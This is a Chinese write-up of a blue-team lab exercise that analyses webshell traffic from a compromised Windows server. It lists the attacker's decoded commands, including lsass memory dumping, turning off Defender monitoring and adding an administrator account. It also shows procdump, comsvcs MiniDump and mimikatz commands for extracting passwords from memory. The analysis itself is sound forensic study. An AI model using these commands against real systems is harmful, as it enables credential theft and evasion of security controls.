首页 > 其他分享 >玄机蓝队靶场_应急响应_44:流量分析-蚂蚁爱上树

玄机蓝队靶场_应急响应_44:流量分析-蚂蚁爱上树

时间:2024-09-05 10:03:44浏览次数:10  
标签:WWW 蓝队 cd PHPTutorial phpStudy 靶场 echo 44 onlineshop

分析:

1,现在有一段被getshell的流量,需要找出黑客都做了些什么。流量大概可以分成两种,http和tcp。先看http。
2,发现蚁剑流量,所以先把蚁剑的执行命令先全部找出来。
蚁剑流量过滤:

##(过滤请求包)
http.request.uri matches "product2.php.*" && http.request.method == "POST"
##(过滤请求包和回包)
(http.request.method == "POST" && http.request.uri matches "product2.php.*") || http.response

分析蚁剑流量命令:(shell是取命令参数第三个字符往后的字符串解码)


1.C:/phpStudy/PHPTutorial/WWW/onlineshop/database/onlineshop.sql

2.C:/

3.cmd  cd /d "C:/phpStudy/PHPTutorial/WWW/onlineshop"&ls&echo [S]&cd&echo [E]           ls

4.cmd cd /d "C:\\phpStudy\\PHPTutorial\\WWW\\onlineshop"&dir&echo [S]&cd&echo [E]           dir

5.cmd cd /d "C:\\phpStudy\\PHPTutorial\\WWW\\onlineshop"&whoami&echo [S]&cd&echo [E]      whoami    返回vulntarget\win101

6.和第五个一样

7.cmd cd /d "C:\\phpStudy\\PHPTutorial\\WWW\\onlineshop"&systeminfo&echo [S]&cd&echo [E]    systeminfo

8.cd /d "C:\\phpStudy\\PHPTutorial\\WWW\\onlineshop"&dir c:\&echo [S]&cd&echo [E]

(3412) cmd cd /d "C:\\phpStudy\\PHPTutorial\\WWW\\onlineshop"&net user&echo [S]&cd&echo [E]

(3483) cmd cd /d "C:\\phpStudy\\PHPTutorial\\WWW\\onlineshop"&net localgroup administrators&echo [S]&cd&echo [E]

(3531)  cd /d "C:\\phpStudy\\PHPTutorial\\WWW\\onlineshop"&net group "domain group" /domain&echo [S]&cd&echo [E]

(3759)  cd /d "C:\\phpStudy\\PHPTutorial\\WWW\\onlineshop"&net group "domain admins" /domain&echo [S]&cd&echo [E]

(3867)  cd /d "C:\\phpStudy\\PHPTutorial\\WWW\\onlineshop"&net view&echo [S]&cd&echo [E]

(3996) cd /d "C:\\phpStudy\\PHPTutorial\\WWW\\onlineshop"&net share&echo [S]&cd&echo [E]

(4069) cd /d "C:\\phpStudy\\PHPTutorial\\WWW\\onlineshop"&rundll32.exe comsvcs.dll, MiniDump 852 C:\Temp\OnlineShopBackup.zip full&echo [S]&cd&echo [E]

 (4250) cd /d "C:\\phpStudy\\PHPTutorial\\WWW\\onlineshop"&dir c:\temp&echo [S]&cd&echo [E]

(4282) cd /d "C:\\phpStudy\\PHPTutorial\\WWW\\onlineshop"&dir c:\temp&echo [S]&cd&echo [E]

(4568) cd /d "C:\\phpStudy\\PHPTutorial\\WWW\\onlineshop"&rundll32.exe comsvcs.dll, MiniDump 852 C:\OnlineShopBackup.zip full&echo [S]&cd&echo [E]

(4969) cd /d "C:\\phpStudy\\PHPTutorial\\WWW\\onlineshop"&ls&echo [S]&cd&echo [E]

(4979) cd /d "C:\\phpStudy\\PHPTutorial\\WWW\\onlineshop"&dir&echo [S]&cd&echo [E]

(4989) cd /d "C:\\phpStudy\\PHPTutorial\\WWW\\onlineshop"&copy store.php c:\temp&echo [S]&cd&echo [E]

(4999) cd /d "C:\\phpStudy\\PHPTutorial\\WWW\\onlineshop"&dir c:\temp&echo [S]&cd&echo [E]

(5598) cd /d "C:\\phpStudy\\PHPTutorial\\WWW\\onlineshop"&powershell -ep bypass Set-Mppreference -DisableRaltimeMonitoring $true&echo [S]&cd&echo [E]

(5622) cd /d "C:\\phpStudy\\PHPTutorial\\WWW\\onlineshop"&powershell -ep bypass Set-Mppreference -DisableRealtimeMonitoring $true&echo [S]&cd&echo [E]

(5674) cd /d "C:\\phpStudy\\PHPTutorial\\WWW\\onlineshop"&powershell -ep bypass Get-MpComputerStatus&echo [S]&cd&echo [E]

(5922) cd /d "C:\\phpStudy\\PHPTutorial\\WWW\\onlineshop"&rundll32.exe comsvcs.dll, MiniDump 852 C:\temp\OnlineShopBackup.zip full&echo [S]&cd&echo [E]

(6228) cd /d "C:\\phpStudy\\PHPTutorial\\WWW\\onlineshop"&dir c:\temp&echo [S]&cd&echo [E]

(6944) C:/Temp/OnlineShopBack.zip

(14967) cd /d "C:/phpStudy/PHPTutorial/WWW/onlineshop"&dir c:\windows\system32&echo [S]&cd&echo [E] 

(15029) cd /d "C:\\phpStudy\\PHPTutorial\\WWW\\onlineshop"&dir c:\windows\config&echo [S]&cd&echo [E]

(15146) cd /d "C:\\phpStudy\\PHPTutorial\\WWW\\onlineshop"&net user&echo [S]&cd&echo [E]

(15190) cd /d "C:\\phpStudy\\PHPTutorial\\WWW\\onlineshop"&net user admin Password1 /add&echo [S]&cd&echo [E]

(15222) cd /d "C:\\phpStudy\\PHPTutorial\\WWW\\onlineshop"&net localgroup administrators admin /add&echo [S]&cd&echo [E]

(15235) cd /d "C:\\phpStudy\\PHPTutorial\\WWW\\onlineshop"&net user&echo [S]&cd&echo [E]

(15248) cd /d "C:\\phpStudy\\PHPTutorial\\WWW\\onlineshop"&net localgroup administrators&echo [S]&cd&echo [E]

(15274) cd /d "C:\\phpStudy\\PHPTutorial\\WWW\\onlineshop"&whoami /all&echo [S]&cd&echo [E]

3,把所有命令都找出来了,发现它添加了一个admin用户,并且把它放进了administrater中,
还执行了一些命令,需要看看到底是什么命令。命令含义问了GPT大概知道了,但是没用,每个HTTP的POST对应的回包都看了,但是没什么收获。
没啥思路了,看到有SMB2协议,可能是从里面下手。SMB2协议就不会了,只知道可以从里面拿加密信息去爆破用户密码。看WP吧。

解题:

1:flag1解出来了,在黑客执行的蚁剑命令中,cd /d "C:\phpStudy\PHPTutorial\WWW\onlineshop"&net user admin Password1 /add&echo [S]&cd&echo [E]
flag{Password1}
2:flag2是命令cd /d "C:\phpStudy\PHPTutorial\WWW\onlineshop"&rundll32.exe comsvcs.dll, MiniDump 852 C:\OnlineShopBackup.zip full&echo [S]&cd&echo [E]
其中的852就是进程号,这里需要了解rundll32和miniDump函数的内存转储文件功能,就好理解了。
flag{852}
3:flag3
看了WP思路猜错了,对比原本思路,可以深入的点是,1.对执行的命令的详细分析程度还不够,如果足够详细,那么就能发现lsass进程号,2.转储文件早看到了,以为在wireshark里可以导出,但是文件名没找到我就没管它,结果发现文件名是product2.php,因为请求是http://10.0.10.99/onlineshop/product2.php,然后命令执行下载的OnlineShopBackup.zip,所以wireshark会把文件名命名为product2.php...
image

还有lsass进程是个特殊的进程,lsass是Windows系统的安全机制,我们登录系统输入的密码会保存在lsass进程内存中,它经过wdigest和tspkg两个模块,使用可逆的算法进行加密后存储在内存中。所以使用rundll32直接执行comsvcs.dll的导出函数MiniDump来Dump进程内存。得到内存转储文件后,用分析爆破软件对其中的密码进行爆破,即可得到最后一个flag的答案。

rundll32.exe:用于调用和执行 DLL 文件中的函数的 Windows 系统程序。

comsvcs.dll: 是一个系统 DLL 文件,`MiniDump` 是该 DLL 提供的一个功能,用于创建系统状态的转储文件。

那么接下来就是对于转储文件的分析爆破了。

首先自己本地实现一下整个步骤:

手动DMP:
image
image

工具DMP:

procexp64:
image

procdump64:

工具地址:https://learn.microsoft.com/zh-cn/sysinternals/downloads/procdump
image

comsvcs.dll:

无论是cmd还是powershell都是要管理员权限执行判断SeDebugPrivilege特权才有回显。

image

# 查看lsass.exe 的PID号
tasklist /svc | findstr lsass.exe 
# 管理员权限
# Procdump 抓取lsass进程dmp文件
procdump64.exe -accepteula -ma lsass.exe lsass_dump
# 通过lsass的pid抓取
procdump64.exe -accepteula -ma pid lsass_dump

# createdump.exe抓取dmp
createdump.exe -u -f lsass.dmp lsass[PID]

# comsvcs.dll获取dmp
# 需要保证当前会话已经启用SeDebugPrivilege特权
# cmd本身会禁用该特权,powershell默认开启
# 判断cmd是否开启
whoami /priv | findstr SeDebugPrivilege
# 判断powershell是否开启
powershell whoami /priv | findstr SeDebugPrivilege
rundll32.exe comsvcs.dll, MiniDump lsass[PID] lsass.dmp full

参考:

https://blog.csdn.net/qq_55202378/article/details/140419202

https://mp.weixin.qq.com/s/KgkilGEUmle5P_KvzAjDmw

https://zhuanlan.zhihu.com/p/101328722

https://blog.csdn.net/qq_37103755/article/details/127966328

https://learn.microsoft.com/zh-cn/sysinternals/downloads/procdump

拿到DMP后,可以看到区别:
image
image
image

因为是蚁剑流量,前后都有混淆随机字符串,都得去掉,同时解密请求包也可以发现多余的字符串:

image

更改特征一样之后用mimikatz

sekurlsa::minidump C:\\Desktop\mimikatz_trunk\Win32\test.dmp
sekurlsa::logonpasswords

image
image

这里我就不花钱了。

flag{admin#123}

收获理解:

1:原本Windows系统中保存密码相关的文件是SAM文件,静态的,SYSTEM文件中含有加密密钥对SAM整体进行了加密,且整体加密下,还有SYSkey模块对密码哈希进行了额外加密,整体对密码哈希进行了两层加密。所以如果离线导出SAM文件进行破解获取NTLM,那么SYSTEM也需要导出。如果在线读取SAM中的密码哈希,那么需要mimikatz提升权限到system,然后用syskey进行解密获取即可。如果有内存转储文件,因为内存中的肯定是明文,所以mimikatz直接读取dmp即可。

另外询问AI后得知,Windows8.1版本之后不使用syskey加密了,不知道真假。

2:这段流量中黑客进行的操作就是上传shell后,内存转储lsass进程,然后下载流量,mimikatz进行用户的NTLM获取,最后去破解对应的NTLM即可拿到用户的密码。

标签:WWW,蓝队,cd,PHPTutorial,phpStudy,靶场,echo,44,onlineshop
From: https://www.cnblogs.com/blue-red/p/18397796

相关文章

  • 代码随想录算法训练营|Day07 LeetCode 344.反转字符串 ,541.反转字符串||,卡玛网54.替换
    344.反转字符串344.反转字符串-力扣(LeetCode)classSolution{public:voidreverseString(vector<char>&s){intlens=s.size();intright,left;if(lens%2!=0)//奇数个{right=lens/2+1;left=l......
  • 中国大模型大全 · 爆肝干货整理 · 244 个
    中国大模型大全,全面收集有明确来源的大模型情况,包括机构、来源信息和分类等。序号公司大模型省市类别官网说明1百度文心一言北京......
  • RH442 - 性能调优学习笔记(十一)
    Linux跟踪工具常用选项:-c统计数量  -e后面跟系统调用名称,列出打开的文件在遇到执行命令卡顿时,strace可以帮助排查在哪个步骤出了问题。......
  • 靶场战神为何会陨落?
    我从第一个SQL注入漏洞原理学起,从sql-libas到DVWA,到pikachu再到breach系列,DC系列靶场,再到实战挖洞,发现靶场与实战的区别是极其大的。我个人觉得在这种web环境下,难的不是怎么测一个漏洞点,而是怎么找一个漏洞点。靶场与实战最大的区别在于你不知道这个地方到底有没有漏洞,尤......
  • sicp每日一题[1.44]
    Exercise1.44Theideaofsmoothingafunctionisanimportantconceptinsignalprocessing.Iffisafunctionanddxissomesmallnumber,thenthesmoothedversionoffisthefunctionwhosevalueatapointxistheaverageoff(x-dx),f(x),andf(x+......
  • 春秋云镜-RCE靶场漏洞复现
    CVE-2023-26469image.png靶标介绍:Jorani是一款开源的员工考勤和休假管理系统,适用于中小型企业和全球化组织,它简化了员工工时记录、休假请求和审批流程,并提供了多语言支持以满足不同地区的需求。在Jorani1.0.0中,攻击者可以利用路径遍历来访问文件并在服务器上执行......
  • 【靶场】sqli-labs 靶场通关(1-16)
    ......
  • 【靶场】upload-labs-master(前11关)
    ......
  • pikachu文件包含漏洞靶场
    Fileinclusion(local)创建1.php步骤一:选择一个球员提交../../../../1.phpFileInclusion(remote)(远程文件包含)步骤一:更改参数php.ini⾥有两个重要的参数allow_url_fopen、allow_url_include;步骤二:选择球员步骤三:宝塔公网上创建一个6.txt文......
  • pikachu文件包含漏洞靶场攻略
    1.Fileinclusion(local)(本地文件包含)步骤一:选择一个球员提交步骤二:filename后面输入../../../../shw.php访问php文件2.FileInclusion(remote)(远程文件包含)步骤一:修改配置远程包含漏洞的前提:需要php.ini配置如下:allow_url_fopen=on//默认打开Allow_url_include=on/......